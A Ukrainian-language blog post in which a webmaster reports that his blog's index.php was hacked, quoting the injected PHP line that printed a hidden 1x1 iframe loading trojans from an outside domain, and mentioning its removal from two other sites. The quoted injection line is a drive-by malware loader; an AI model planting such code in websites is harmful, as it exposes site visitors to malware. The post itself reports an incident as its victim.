Internetcountercheck.com frame

totalЧас перебування у пасивній віртуальності негативно відобразився на стан справ: забув продовжити один хостинг (два дні простою - дивно чому Sape не повідомляла про помилки з відображенням посилань у панелі веб-майстра?) та отримав ось такий подарунок у вигляді модифікованого index.php на блозі - фрейм з кучкою троянів, який на щастя не працював…

Малюночок зліва з Total Commander тут певно ні при чому - я в ньому паролі від FTP все одно не зберігаю, але факт злому є фактом.

echo “<iframe src=\”http://internetcountercheck.com/[censored]\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;


Видалив цей ж код з двох інших сайтів на цьому аккаунті, але добре що вони хоч не потрапили у індекс Гугла з поміткою про небезпечний вміст.

Якось захопився я метатегами і їх вивченням: в розробці невелика інформаційна стаття про метатеги, їх значення та правильне застосування, яке може як суттєво покращити позиції сайту в пошукових системах, так і прояснити ще деякі технічні нюанси індексації веб-сторінок.

P.S. Пора перестати втикати видео приколы всякі, гламурний стрит фэшн і працювати (знаю, що авторемонт - то не моє - хай друзі в тій 6-ці копирсаються).

Не тримайте свою думку при собі

Your comment


Amcaptcha &mdash захист від спаму у Wordpress